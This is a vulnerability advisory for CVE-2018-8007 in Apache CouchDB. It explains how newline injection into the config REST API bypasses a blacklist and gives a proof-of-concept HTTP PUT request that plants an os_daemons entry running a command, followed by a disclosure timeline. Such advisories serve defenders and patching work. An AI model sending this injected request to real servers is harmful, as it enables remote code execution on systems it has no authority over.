Advisory: CVE-2018-8007 – Apache CouchDB Remote Code Execution

Overview

Title: CouchDB Arbitrary Write Local.ini Configuration Authenticated Remote Code Execution
Version: <=2.1.1
Researcher: Francesco Oddo at MDSec Labs (https://www.mdsec.co.uk)
Disclosure Date: 5/01/2018
Public Disclosure Date: 30/04/2018
Severity: High

Description

Sensitive contents can be arbitrarily written on the main CouchDB local.ini configuration file via the REST API due to a lack of input validation. This attack vector can be abused to spawn an arbitrary process and obtain remote code execution in the context of the CouchDB process user.

The vulnerability is essentially a bypass of the security fix implemented for CVE-2017-12636.

The attack requires an authenticated admin user session, which mitigates the overall security risk.

Technical details

An admin user is allowed to add configuration options via the Fauton web UI. As shown in the CouchDB Erlang code below multiple configuration options with a security impact are explicitly blacklisted, restricting their modification from a console session only.

File: https://github.com/apache/couchdb/blob/master/src/couch/src/couch_util.erl

[code]-define(BLACKLIST_CONFIG_SECTIONS, [
<<“daemons”>>,
<<“external”>>,
<<“httpd_design_handlers”>>,
<<“httpd_db_handlers”>>,
<<“httpd_global_handlers”>>,
<<“native_query_servers”>>,
<<“os_daemons”>>,
<<“query_servers”>>
]).
 
check_config_blacklist(Section) ->
case lists:member(Section, ?BLACKLIST_CONFIG_SECTIONS) of
true ->
Msg = <<“Config section blacklisted for modification over HTTP API.”>>,
throw({forbidden, Msg});
_ ->
ok
end.
[/code]

This behavior can be however trivially bypassed by inserting newline character sequences to inject an arbitrary blacklisted configuration field. The proof of concept below shows the exploitation using the ‘os_daemons’ option to obtain remote command execution.

[code]PUT /_node/couchdb@127.0.0.1/_config/cors/origins HTTP/1.1
Host: <IP>:5984
Content-Length: 84
Accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Authorization: Basic <authdata>
Connection: close
 
“http://testdomain.com\n\n[os_daemons]\nhackdaemon = /usr/bin/touch /tmp/hack”[/code]

After the above request is sent, the local.ini configuration file will contain the malicious os_daemon entry.

Timeline

05/01/2018: MDSec reported the vulnerability to the Apache Security team
08/01/2018: MDSec followed up with Apache to confirm receipt after no reply
08/01/2018: Apache responded confirming the report looks credible
11/04/2018: MDSec follow up with Apache stating the intention to release following expiration of 90-day grace period
11/04/2018: Apache ask to hold off disclosure
12/04/2018: MDSec agrees to hold off disclosure within reason
27/04/2018: MDSec contact Apache to inform of change in point of contact for handling disclosures
28/04/2018: Apache respond stating project is run by volunteers and MDSec should subscribe to the CouchDB mailinglists and watch for security patches.
28/04/2018: MDSec respond indicating that we cannot monitor mailinglists for patches and given it’s been 3.5 months since disclosure and admin authentication is required, the vulnerability will be released on 28/05/2018.
30/04/2018: Apache request CVE embargoed until 28/05/2018